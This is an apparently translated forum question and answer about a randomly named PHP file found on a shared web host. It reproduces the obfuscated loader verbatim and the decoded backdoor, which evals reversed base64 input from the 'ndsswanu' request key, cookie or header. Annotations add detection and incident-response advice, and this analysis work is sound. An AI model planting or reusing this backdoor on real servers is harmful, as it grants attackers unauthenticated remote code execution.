
我的托管服务器上随机命名的php文件


大约一周前,我注意到在我共享的web主机的根文件夹中出现了一个看似随机命名的PHP文件。文件名为“hvkqwvkj.php”,在查看所有者/组和权限信息之前,我愚蠢地删除了它。我想知道这是什么以及它是如何到达那里的。以下是该文件的内容:

<?php
// Obfuscated PHP loader exactly as it was found on the host; kept verbatim for
// analysis, every line starting with "//" is annotation only.
// Nearly all of the assignments below are decoys. The real logic further down
// reads single characters out of a handful of them ($commissioner, $davida,
// $firmware, $ines, $arraigning, $closest, $equivalently, ...) to spell out a
// function name and a piece of source code one character at a time, so that no
// suspicious keyword (eval, base64_decode, $_REQUEST, ...) appears literally in
// the file. The many unused one- or two-character strings exist only to make
// the file look like noise and to defeat keyword-based scanners.
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns@iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';

$beauregard ='S';$ines='te]ee'; $imogen = 's';

$irene ='("as3:0$r';$grassier ='4';

$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';

$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';

// Spells out the name of a built-in function character by character. Following
// the indices ('c' . 'r' . 'e' . 'a' . 't' . 'e' . '_' . 'f' . 'u' . 'n' . 'c' .
// 't' . 'i' . 'o' . 'n') gives "create_function", which is then called through
// the variable so the name never appears in the file. create_function() was
// removed in PHP 8.0, so this loader only runs on PHP 7.x and earlier.
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].

$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
// $arraigning[3] is a single space: the (empty) parameter list handed to create_function().
$bob=$arraigning[3];

// Assembles the body of the anonymous function one character at a time; it
// resolves to "eval(array_pop(func_get_args()));", i.e. a function that evals
// whatever string is passed as its last argument. The body is never written to
// disk in readable form, which is the point of the obfuscation.
// On the line that closes this call (`... $devoutness);$druggist (`) the newly
// created function is invoked immediately. Most of its arguments are junk
// ($dinnie, $gwenneth and $disdains are never defined and only raise notices);
// the final argument is the real payload, assembled character by character from
// here to the end of the file. It is the same code shown decoded further down
// this page: it merges $_REQUEST, $_COOKIE and $_SERVER, looks for one specific
// key, and evals its base64-decoded value.
// Detection note: the combination of dozens of short string literals with
// repeated single-character indexing ($x['3'] . $y[0] ...) and a call through
// a variable function name is a useful signature for this kind of loader even
// when the decoy variable names change between samples.
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .

$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .

$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.

$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].

$glutting['0'] .

$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].

$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .

$closest['8'] .$likeness. $contrivance[0].

$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .

$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .

$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .

$equivalently['0'] .

$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.

$appliance .

$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].

$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .

$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .

$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .

$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness ); 
// Incident-response note: deleting this file removes the backdoor but not
// whatever placed it there. Check the host for other recently modified or
// similarly named PHP files, search the web server access logs for the key
// name used in the decoded payload, and rotate the hosting/FTP credentials
// before treating the incident as closed.

我已经解码出了实际的代码。
该文件使用了混淆来规避检测。它定义一个函数,然后使用eval执行它。

这是有效载荷(关键部分)

您立即将其删除是正确的,但这只是更大问题的症状。这个脚本是如何出现的,才是更大的问题。


此代码允许攻击者通过多种攻击向量远程运行任意php代码。

显然,这个文件看起来毫无意义,但即使对编程新手来说也能看出它实际上在做一些事情:它定义了一个函数,然后使用eval来执行它。接下来还有更多。
// Decoded payload: this is the string the obfuscated loader above hands to the
// function it creates with create_function(), which then evals it. Kept
// verbatim for analysis; every added comment is annotation only.
//Take all types of request data and merge them
//This opens up many types of attack vectors
// Because $_SERVER is merged in, the trigger can arrive as a query/POST
// parameter, a cookie, or a request header (PHP exposes headers as
// $_SERVER["HTTP_*"]). For defenders this also means all three channels are
// worth searching in the web server and application logs.
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);

//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and record its value if it's set
// The key name is the sample's best indicator of compromise: search the
// access logs for "ndsswanu" to establish when, and from where, the backdoor
// was used. When the key is absent the script exits via die, so an ordinary
// request for the file returns nothing and looks harmless.
$a = isset($i["ndsswanu"]
        ) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);

//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
// This is unauthenticated remote code execution: anyone who knows the key name
// can run arbitrary PHP as the web server user. Reversing the value before and
// after base64 decoding presumably also keeps readable base64/PHP out of the
// raw request, which weakens naive request-content signatures (inference, not
// something the sample itself states).
eval(strrev(base64_decode(strrev($a))));